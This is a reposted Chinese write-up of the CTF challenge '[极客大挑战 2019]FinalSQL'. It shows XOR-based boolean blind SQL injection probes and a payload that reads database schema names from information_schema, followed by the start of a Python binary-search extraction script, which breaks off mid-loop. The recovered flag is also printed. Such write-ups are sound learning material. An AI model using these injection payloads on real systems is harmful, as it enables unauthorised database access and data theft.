设为首页收藏本站
开启辅助访问

[极客大挑战 2019]FinalSQL

 您所在的位置:网站首页 极客love [极客大挑战 2019]FinalSQL

[极客大挑战 2019]FinalSQL

2023-07-22 01:29| 来源: 网络整理| 查看: 265

[极客大挑战 2019]FinalSQL 先骂出题人

出题人是真的狗,废话不多说先放最后爆破的结果:

cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{01d295cf-0c9c-44db-98ca-c7877048000a}

真的傻了都,还好二分法比较给力,而且用代码解放双手,不然寄刀片了。

找注入点

好好做题。 在这里插入图片描述 提示用python爆破盲注了,神秘代码是啥,点一下发现url变了:

http://c7f4deb2-e4eb-4cec-a2b4-6014fb5b6c2d.node3.buuoj.cn/search.php?id=1

注入点应该是这里了,题目都提示了盲注,那想来一些关键词比如order by union 啥的都用不了了。

然后确实也不能用。

盲注的话主要有三个,布尔、时间、报错。 本题是基于布尔的盲注。

首先测试一下:

?id=1^1 ?id=1^0

在这里插入图片描述 在这里插入图片描述 这里使用异或操作来进行注入,1^1=0,0^0=0,1^0=1。

构造payload:

?id=1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1

在这里插入图片描述 然后构造脚本:

import requests import time url = "http://c7f4deb2-e4eb-4cec-a2b4-6014fb5b6c2d.node3.buuoj.cn/search.php?" temp = {"id" : ""} column = "" for i in range(1,1000): time.sleep(0.06) low = 32 high =128 mid = (low+high)//2 while(low


【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3